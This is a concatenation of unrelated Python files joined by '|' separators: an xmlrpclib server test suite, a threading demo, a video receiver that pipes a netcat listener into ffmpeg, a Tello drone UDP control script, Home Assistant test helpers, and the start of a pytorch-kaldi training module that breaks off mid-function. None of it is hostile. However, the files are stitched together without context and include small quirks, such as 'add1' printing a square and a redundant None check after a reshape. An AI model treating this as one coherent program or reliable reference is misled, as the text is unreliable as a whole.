SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
        # if the method is GET and no request_text is given, it runs handle_get
        # capture stdout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
        # the server should respond with a Fault; if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
        # skip the first 44 characters (the HTTP headers); we only need the XML body
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn._conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_custom_user_agent\r\n" in req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_host\r\n" in req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_request\r\n" in req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assert_("X-Test: test_send_content\r\n" in req)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
Thread_test.py
|
import threading
import time
class MyThread(threading.Thread):
def __init__(self, target, args):
self.target = target
self.args = args
threading.Thread.__init__(self)
def run(self):
        # Run the target callable supplied at construction time.
        self.target(self.args)
        # time.sleep(1)
        print("I'm {}".format(self.name))
def add1(X):
    print('Result: %d' % (X ** 2))
if __name__ == '__main__':
l1 = []
start_time = time.time()
for i in range(4):
t = MyThread(target=add1, args=i)
l1.append(t)
for i in l1:
i.start()
for i in l1:
i.join()
end_time = time.time()
print('use time {}'.format(end_time - start_time))
|
video.py
|
import subprocess as sp
import os
import cv2
import numpy as np
import threading
import socket
import struct
import io
import config
from video.detection import BallDetector
class VideoPlayer:
def __init__(self, detection):
self.video_port = config.video_port
self.detection = detection
self.subprocesses = []
def start(self):
if not self.detection:
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
mplayer = sp.Popen(('mplayer', '-noconsolecontrols', '-nolirc' , '-fps', '60',
'-cache', '1024', '-'), stdin=netcat.stdout)
self.subprocesses.append(netcat)
self.subprocesses.append(mplayer)
else:
            # Flag used to tell the video thread to stop itself
self.finish_stream = False
self.ball_detector = BallDetector()
thr = threading.Thread(target = self.initialize_playback)
thr.start()
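    # Note: both playback paths expect the remote sender to push the video
    # stream to this machine's video_port over TCP (the local "nc -l" acts as
    # the receiver). The exact sender (e.g. a camera capture piped into nc on
    # the remote host) is an assumption and is not part of this module.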
def finish(self):
self.finish_stream = True
# Clean up subprocesses, if there are any.
for subprocess in self.subprocesses:
subprocess.kill()
def initialize_playback(self):
'''
video_socket = socket.socket()
video_socket.bind(('0.0.0.0', self.video_port))
video_socket.listen(0)
# Accept a single connection and make a file-like object out of it
connection = video_socket.accept()[0].makefile('rb')
try:
while True:
if self.finish_stream:
break
# Read the length of the image as a 32-bit unsigned int. If the
# length is zero, quit the loop
image_len = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
if not image_len:
break
# Construct a stream to hold the image data and read the image
# data from the connection
image_stream = io.BytesIO()
image_stream.write(connection.read(image_len))
# Rewind the stream, open it as an image with opencv and do some
# processing on it
image_stream.seek(0)
data = np.fromstring(image_stream.getvalue(), dtype=np.uint8)
imagedisp = cv2.imdecode(data, 1)
if self.detection_switch:
imagedisp = self.ball_detector.process_frame(imagedisp)
cv2.imshow("Frame", imagedisp)
print('okk')
finally:
connection.close()
video_socket.close()
'''
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
command = [ 'ffmpeg',
'-i', '-', # fifo is the named pipe
'-pix_fmt', 'bgr24', # opencv requires bgr24 pixel format.
'-vcodec', 'rawvideo',
'-an','-sn', # we want to disable audio processing (there is no audio)
'-f', 'image2pipe', '-']
ffmpeg = sp.Popen(command, stdin=netcat.stdout , stdout=sp.PIPE, bufsize=10**4)
self.subprocesses.append(netcat)
self.subprocesses.append(ffmpeg)
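        # With '-pix_fmt bgr24' every decoded frame is exactly width*height*3
        # bytes (assuming a 640x480 stream: 640*480*3 = 921600), which is why
        # the read below asks for that many bytes before reshaping to
        # (480, 640, 3).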
while True:
if self.finish_stream:
break
# Capture frame-by-frame
raw_image = ffmpeg.stdout.read(640*480*3)
# transform the byte read into a np array
image = np.fromstring(raw_image, dtype='uint8')
# Notice how height is specified first and then width
image = image.reshape((480,640,3))
if image is not None:
image = self.ball_detector.process_frame(image)
cv2.imshow('Video', image)
ffmpeg.stdout.flush()
cv2.destroyAllWindows()
'''
netcat = sp.Popen(('nc', '-l', '-p', str(self.video_port)), stdout=sp.PIPE)
#ffmpegCmd = ['ffmpeg', '-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-vf', 'fps=40', '-']
#ffmpegCmd = ['ffmpeg', '-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-']
ffmpegCmd = ['ffmpeg', '-thread_queue_size', '0','-i', '-', '-f', 'rawvideo', '-vcodec', 'bmp', '-']
ffmpeg = sp.Popen(ffmpegCmd, stdin = netcat.stdout, stdout = sp.PIPE)
self.subprocesses.append(netcat)
self.subprocesses.append(ffmpeg)
while True:
fileSizeBytes = ffmpeg.stdout.read(6)
fileSize = 0
for i in range(4):
fileSize += fileSizeBytes[i + 2] * 256 ** i
bmpData = fileSizeBytes + ffmpeg.stdout.read(fileSize - 6)
image = cv2.imdecode(np.fromstring(bmpData, dtype = np.uint8), 1)
cv2.imshow('Frame', image)
'''
|
keyboardCommand.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
import threading
import socket
import sys
import time
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
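# Control flow (a sketch based on the Tello SDK; the drone address above is the
# factory default): plain-text commands are sent as UTF-8 UDP datagrams to
# 192.168.10.1:8889, and the drone's replies ("ok"/"error"/telemetry) arrive
# back on local port 9000, where the recv() thread below prints them.
# The first command is normally "command", which switches the drone into SDK
# mode before "takeoff", "land", etc. are accepted.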
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\nExit . . .\n')
break
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print ('end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
while True:
try:
msg = input("");
if not msg:
break
if 'end' in msg:
print ('...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
except KeyboardInterrupt:
print ('\n . . .\n')
sock.close()
break
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import os
import sys
from datetime import timedelta
from unittest.mock import patch, MagicMock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from aiohttp import web
from homeassistant import core as ha, loader
from homeassistant.bootstrap import (
setup_component, async_prepare_setup_component)
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT)
from homeassistant.components import sun, mqtt
from homeassistant.components.http.auth import auth_middleware
from homeassistant.components.http.const import (
KEY_USE_X_FORWARDED_FOR, KEY_BANS_ENABLED, KEY_TRUSTED_NETWORKS)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
# FIXME should not be a daemon. Means hass.stop() not called in teardown
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop.close()
stop_event.set()
threading.Thread(name="LoopThread", target=run_loop, daemon=True).start()
orig_start = hass.start
orig_stop = hass.stop
@patch.object(hass.loop, 'run_forever')
@patch.object(hass.loop, 'close')
def start_hass(*mocks):
"""Helper to start hass."""
orig_start()
hass.block_till_done()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
hass.start = start_hass
hass.stop = stop_hass
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
loop._thread_ident = threading.get_ident()
hass = ha.HomeAssistant(loop)
hass.async_track_tasks()
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS:
yield from loop.run_in_executor(None, loader.prepare, hass)
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
with patch.object(loop, 'add_signal_handler'), \
patch('homeassistant.core._async_create_timer'):
yield from orig_start()
hass.async_start = mock_async_start
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
def mock_service(hass, domain, service):
"""Setup a fake service.
Return a list that logs all calls to fake service.
"""
calls = []
# pylint: disable=redefined-outer-name
@ha.callback
def mock_service(call):
""""Mocked service call."""
calls.append(call)
# pylint: disable=unnecessary-lambda
hass.services.register(domain, service, mock_service)
return calls
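# A minimal usage sketch (domain and service names are hypothetical):
#   calls = mock_service(hass, 'test_domain', 'test_service')
#   hass.services.call('test_domain', 'test_service', blocking=True)
#   assert len(calls) == 1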
def fire_mqtt_message(hass, topic, payload, qos=0):
"""Fire the MQTT message."""
hass.bus.fire(mqtt.EVENT_MQTT_MESSAGE_RECEIVED, {
mqtt.ATTR_TOPIC: topic,
mqtt.ATTR_PAYLOAD: payload,
mqtt.ATTR_QOS: qos,
})
def fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.fire(EVENT_TIME_CHANGED, {'now': time})
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def ensure_sun_risen(hass):
"""Trigger sun to rise if below horizon."""
if sun.is_on(hass):
return
fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10))
def ensure_sun_set(hass):
"""Trigger sun to set if above horizon."""
if not sun.is_on(hass):
return
fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10))
def load_fixture(filename):
"""Helper to load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path) as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
def mock_http_component(hass):
"""Mock the HTTP component."""
hass.http = MagicMock()
hass.config.components.append('http')
hass.http.views = {}
def mock_register_view(view):
"""Store registered view."""
if isinstance(view, type):
# Instantiate the view, if needed
view = view()
hass.http.views[view.name] = view
hass.http.register_view = mock_register_view
def mock_http_component_app(hass, api_password=None):
"""Create an aiohttp.web.Application instance for testing."""
hass.http = MagicMock(api_password=api_password)
app = web.Application(middlewares=[auth_middleware], loop=hass.loop)
app['hass'] = hass
app[KEY_USE_X_FORWARDED_FOR] = False
app[KEY_BANS_ENABLED] = False
app[KEY_TRUSTED_NETWORKS] = []
return app
def mock_mqtt_component(hass):
"""Mock the MQTT component."""
with patch('homeassistant.components.mqtt.MQTT') as mock_mqtt:
setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: {
mqtt.CONF_BROKER: 'mock-broker',
}
})
return mock_mqtt
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
self._setup = setup
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if async_setup is not None:
self.async_setup = async_setup
def setup(self, hass, config):
"""Setup the component.
        We always define this mock because a MagicMock-provided setup would be
        seen by the executor as a coroutine and raise an exception.
        """
if self._setup is not None:
return self._setup(hass, config)
return True
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
self._setup_platform = setup_platform
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
def setup_platform(self, hass, config, add_devices, discovery_info=None):
"""Setup the platform."""
if self._setup_platform is not None:
self._setup_platform(hass, config, add_devices, discovery_info)
class MockToggleDevice(ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
    # match using endswith, trying the longest suffixes first
    matchlist = sorted(list(files_dict.keys()), key=len, reverse=True) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug('patch_yaml_files match %s', fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug('patch_yaml_files using real file: %s', fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError('File not found: {}'.format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
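# A minimal usage sketch (the file name and YAML content are hypothetical):
#   with patch_yaml_files({'/config/test.yaml': 'key: value'}):
#       assert yaml.load_yaml('/config/test.yaml') == {'key': 'value'}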
def mock_coro(return_value=None):
"""Helper method to return a coro that returns a value."""
@asyncio.coroutine
def coro():
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager aroung bootstrap.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@asyncio.coroutine
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = yield from async_prepare_setup_component(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug('Configuration for %s, Validated: %s, Original %s',
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.bootstrap.async_prepare_setup_component',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
|
core.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import sys
import configparser
import os
from utils import is_sequential_dict, model_init, optimizer_init, forward_model, progress
from data_io import load_counts
import numpy as np
import random
import torch
from distutils.util import strtobool
import time
import threading
from data_io import read_lab_fea, open_or_fd, write_mat
from utils import shift
from prettytable import PrettyTable
# from torchsummary import summary
def read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process
):
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
if wait_for_process:
p.join()
return None
else:
return p
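# A minimal usage sketch of the chunk double-buffering above (the cfg paths are
# hypothetical): the first chunk is read synchronously, while the next one is
# loaded in a background thread as the current chunk is being processed.
#   shared = []
#   read_next_chunk_into_shared_list_with_subprocess(
#       read_lab_fea, shared, 'exp/chunk1.cfg', False, 'exp/out', wait_for_process=True)
#   nxt = read_next_chunk_into_shared_list_with_subprocess(
#       read_lab_fea, shared, 'exp/chunk2.cfg', False, 'exp/out', wait_for_process=False)
#   ...  # train/validate on chunk 1 here
#   nxt.join()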
def extract_data_from_shared_list(shared_list):
data_name = shared_list[0]
data_end_index_fea = shared_list[1]
data_end_index_lab = shared_list[2]
fea_dict = shared_list[3]
lab_dict = shared_list[4]
arch_dict = shared_list[5]
data_set = shared_list[6]
return data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set
def convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda):
if not (save_gpumem) and use_cuda:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float().cuda()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float().cuda()
else:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float()
data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
return data_set_inp, data_set_ref
def run_nn_refac01(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
def _read_chunk_specific_config(cfg_file):
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
            sys.exit(1)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _get_batch_size_from_config(config, to_do):
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
elif to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
elif to_do == "forward":
batch_size = 1
return batch_size
def _initialize_random_seed(config):
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
def _load_model_and_optimizer(fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do):
inp_out_dict = fea_dict
nns, costs = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
optimizers = optimizer_init(nns, config, arch_dict)
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
if net in optimizers:
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
return nns, costs, optimizers, inp_out_dict
